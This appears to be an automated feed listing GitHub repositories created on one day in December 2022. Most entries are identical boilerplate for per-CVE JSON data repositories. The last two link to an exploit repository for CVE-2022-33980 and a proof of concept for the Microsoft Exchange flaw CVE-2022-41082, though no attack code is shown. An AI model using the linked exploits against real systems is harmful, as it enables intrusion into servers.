**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-46422 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-46422](https://github.com/Live-Hack-CVE/CVE-2022-46422) create time: 2022-12-22T17:37:14Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-0996 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-0996](https://github.com/Live-Hack-CVE/CVE-2016-0996) create time: 2022-12-22T17:00:37Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-11045 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-11045](https://github.com/Live-Hack-CVE/CVE-2019-11045) create time: 2022-12-22T17:00:26Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-11046 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-11046](https://github.com/Live-Hack-CVE/CVE-2019-11046) create time: 2022-12-22T16:57:57Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-11049 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-11049](https://github.com/Live-Hack-CVE/CVE-2019-11049) create time: 2022-12-22T16:57:51Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-46856 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-46856](https://github.com/Live-Hack-CVE/CVE-2021-46856) create time: 2022-12-22T16:58:24Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-24581 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-24581](https://github.com/Live-Hack-CVE/CVE-2021-24581) create time: 2022-12-22T16:57:54Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-39173 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-39173](https://github.com/Live-Hack-CVE/CVE-2021-39173) create time: 2022-12-22T16:57:47Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-24586 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-24586](https://github.com/Live-Hack-CVE/CVE-2021-24586) create time: 2022-12-22T16:57:41Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-4619 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-4619](https://github.com/Live-Hack-CVE/CVE-2022-4619) create time: 2022-12-22T17:01:47Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-46020 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-46020](https://github.com/Live-Hack-CVE/CVE-2022-46020) create time: 2022-12-22T17:01:44Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-20527 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-20527](https://github.com/Live-Hack-CVE/CVE-2022-20527) create time: 2022-12-22T17:01:41Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-20515 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-20515](https://github.com/Live-Hack-CVE/CVE-2022-20515) create time: 2022-12-22T17:01:38Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-37401 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-37401](https://github.com/Live-Hack-CVE/CVE-2022-37401) create time: 2022-12-22T17:01:34Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-20555 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-20555](https://github.com/Live-Hack-CVE/CVE-2022-20555) create time: 2022-12-22T17:01:31Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-20556 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-20556](https://github.com/Live-Hack-CVE/CVE-2022-20556) create time: 2022-12-22T17:01:27Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-20557 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-20557](https://github.com/Live-Hack-CVE/CVE-2022-20557) create time: 2022-12-22T17:01:22Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-4514 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-4514](https://github.com/Live-Hack-CVE/CVE-2022-4514) create time: 2022-12-22T17:01:18Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-44643 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-44643](https://github.com/Live-Hack-CVE/CVE-2022-44643) create time: 2022-12-22T17:01:15Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-4520 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-4520](https://github.com/Live-Hack-CVE/CVE-2022-4520) create time: 2022-12-22T17:01:11Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-20549 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-20549](https://github.com/Live-Hack-CVE/CVE-2022-20549) create time: 2022-12-22T17:01:08Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-20554 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-20554](https://github.com/Live-Hack-CVE/CVE-2022-20554) create time: 2022-12-22T17:00:51Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-20550 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-20550](https://github.com/Live-Hack-CVE/CVE-2022-20550) create time: 2022-12-22T17:00:48Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-4521 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-4521](https://github.com/Live-Hack-CVE/CVE-2022-4521) create time: 2022-12-22T17:00:44Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-4522 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-4522](https://github.com/Live-Hack-CVE/CVE-2022-4522) create time: 2022-12-22T17:00:40Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-20560 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-20560](https://github.com/Live-Hack-CVE/CVE-2022-20560) create time: 2022-12-22T17:00:34Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-20512 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-20512](https://github.com/Live-Hack-CVE/CVE-2022-20512) create time: 2022-12-22T17:00:30Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-46328 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-46328](https://github.com/Live-Hack-CVE/CVE-2022-46328) create time: 2022-12-22T17:00:23Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-46327 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-46327](https://github.com/Live-Hack-CVE/CVE-2022-46327) create time: 2022-12-22T17:00:20Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-46326 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-46326](https://github.com/Live-Hack-CVE/CVE-2022-46326) create time: 2022-12-22T17:00:16Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-46325 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-46325](https://github.com/Live-Hack-CVE/CVE-2022-46325) create time: 2022-12-22T17:00:13Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-46324 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-46324](https://github.com/Live-Hack-CVE/CVE-2022-46324) create time: 2022-12-22T17:00:09Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-46323 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-46323](https://github.com/Live-Hack-CVE/CVE-2022-46323) create time: 2022-12-22T16:59:52Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-46322 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-46322](https://github.com/Live-Hack-CVE/CVE-2022-46322) create time: 2022-12-22T16:59:49Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-46321 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-46321](https://github.com/Live-Hack-CVE/CVE-2022-46321) create time: 2022-12-22T16:59:45Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-46320 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-46320](https://github.com/Live-Hack-CVE/CVE-2022-46320) create time: 2022-12-22T16:59:42Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-46319 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-46319](https://github.com/Live-Hack-CVE/CVE-2022-46319) create time: 2022-12-22T16:59:39Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-46318 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-46318](https://github.com/Live-Hack-CVE/CVE-2022-46318) create time: 2022-12-22T16:59:35Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-46317 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-46317](https://github.com/Live-Hack-CVE/CVE-2022-46317) create time: 2022-12-22T16:59:32Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-11050 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-11050](https://github.com/Live-Hack-CVE/CVE-2019-11050) create time: 2022-12-22T16:22:19Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-19966 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-19966](https://github.com/Live-Hack-CVE/CVE-2019-19966) create time: 2022-12-22T16:21:55Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-24728 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-24728](https://github.com/Live-Hack-CVE/CVE-2021-24728) create time: 2022-12-22T16:22:26Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-24584 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-24584](https://github.com/Live-Hack-CVE/CVE-2021-24584) create time: 2022-12-22T16:22:16Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-24618 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-24618](https://github.com/Live-Hack-CVE/CVE-2021-24618) create time: 2022-12-22T16:22:12Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-24639 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-24639](https://github.com/Live-Hack-CVE/CVE-2021-24639) create time: 2022-12-22T16:22:06Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-36981 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-36981](https://github.com/Live-Hack-CVE/CVE-2021-36981) create time: 2022-12-22T16:21:52Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-33895 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-33895](https://github.com/Live-Hack-CVE/CVE-2021-33895) create time: 2022-12-22T16:21:48Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-20559 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-20559](https://github.com/Live-Hack-CVE/CVE-2022-20559) create time: 2022-12-22T16:22:22Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-20562 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-20562](https://github.com/Live-Hack-CVE/CVE-2022-20562) create time: 2022-12-22T16:22:09Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-20564 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-20564](https://github.com/Live-Hack-CVE/CVE-2022-20564) create time: 2022-12-22T16:22:03Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-20558 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-20558](https://github.com/Live-Hack-CVE/CVE-2022-20558) create time: 2022-12-22T16:21:59Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-38023 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-38023](https://github.com/Live-Hack-CVE/CVE-2022-38023) create time: 2022-12-22T16:21:45Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-37967 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-37967](https://github.com/Live-Hack-CVE/CVE-2022-37967) create time: 2022-12-22T16:21:42Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-37966 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-37966](https://github.com/Live-Hack-CVE/CVE-2022-37966) create time: 2022-12-22T16:21:38Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-4283 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-4283](https://github.com/Live-Hack-CVE/CVE-2022-4283) create time: 2022-12-22T16:21:33Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41854 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41854](https://github.com/Live-Hack-CVE/CVE-2022-41854) create time: 2022-12-22T16:21:22Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-46344 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-46344](https://github.com/Live-Hack-CVE/CVE-2022-46344) create time: 2022-12-22T15:51:17Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-46343 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-46343](https://github.com/Live-Hack-CVE/CVE-2022-46343) create time: 2022-12-22T15:51:14Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-46342 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-46342](https://github.com/Live-Hack-CVE/CVE-2022-46342) create time: 2022-12-22T15:51:10Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-46341 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-46341](https://github.com/Live-Hack-CVE/CVE-2022-46341) create time: 2022-12-22T15:51:06Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-46340 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-46340](https://github.com/Live-Hack-CVE/CVE-2022-46340) create time: 2022-12-22T15:51:03Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-20586 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-20586](https://github.com/Live-Hack-CVE/CVE-2022-20586) create time: 2022-12-22T15:50:59Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-20585 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-20585](https://github.com/Live-Hack-CVE/CVE-2022-20585) create time: 2022-12-22T15:50:55Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-20584 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-20584](https://github.com/Live-Hack-CVE/CVE-2022-20584) create time: 2022-12-22T15:50:52Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-20583 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-20583](https://github.com/Live-Hack-CVE/CVE-2022-20583) create time: 2022-12-22T15:50:34Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-20582 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-20582](https://github.com/Live-Hack-CVE/CVE-2022-20582) create time: 2022-12-22T15:50:30Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-20593 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-20593](https://github.com/Live-Hack-CVE/CVE-2022-20593) create time: 2022-12-22T15:50:27Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-20591 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-20591](https://github.com/Live-Hack-CVE/CVE-2022-20591) create time: 2022-12-22T15:50:23Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-20590 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-20590](https://github.com/Live-Hack-CVE/CVE-2022-20590) create time: 2022-12-22T15:50:20Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-20589 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-20589](https://github.com/Live-Hack-CVE/CVE-2022-20589) create time: 2022-12-22T15:50:16Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-20588 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-20588](https://github.com/Live-Hack-CVE/CVE-2022-20588) create time: 2022-12-22T15:50:13Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-20587 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-20587](https://github.com/Live-Hack-CVE/CVE-2022-20587) create time: 2022-12-22T15:50:09Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-20594 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-20594](https://github.com/Live-Hack-CVE/CVE-2022-20594) create time: 2022-12-22T15:50:06Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-20592 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-20592](https://github.com/Live-Hack-CVE/CVE-2022-20592) create time: 2022-12-22T15:50:02Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-20600 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-20600](https://github.com/Live-Hack-CVE/CVE-2022-20600) create time: 2022-12-22T15:49:58Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-20596 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-20596](https://github.com/Live-Hack-CVE/CVE-2022-20596) create time: 2022-12-22T15:49:54Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-47896 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-47896](https://github.com/Live-Hack-CVE/CVE-2022-47896) create time: 2022-12-22T14:34:00Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-47895 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-47895](https://github.com/Live-Hack-CVE/CVE-2022-47895) create time: 2022-12-22T14:33:34Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-45347 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-45347](https://github.com/Live-Hack-CVE/CVE-2022-45347) create time: 2022-12-22T14:33:32Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-36625 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-36625](https://github.com/Live-Hack-CVE/CVE-2020-36625) create time: 2022-12-22T12:16:31Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-36624 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-36624](https://github.com/Live-Hack-CVE/CVE-2020-36624) create time: 2022-12-22T12:16:18Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-4633 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-4633](https://github.com/Live-Hack-CVE/CVE-2022-4633) create time: 2022-12-22T12:18:32Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41697 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41697](https://github.com/Live-Hack-CVE/CVE-2022-41697) create time: 2022-12-22T12:16:42Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41654 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41654](https://github.com/Live-Hack-CVE/CVE-2022-41654) create time: 2022-12-22T12:16:39Z

**no description** : [Code-971/CVE-2022-33980-EXP](https://github.com/Code-971/CVE-2022-33980-EXP) create time: 2022-12-22T10:16:08Z

**PoC for the CVE-2022-41082 Vulnerability Effecting Microsoft Exchange Servers** : [balki97/CVE-2022-41082-POC](https://github.com/balki97/CVE-2022-41082-POC) create time: 2022-12-22T09:35:26Z

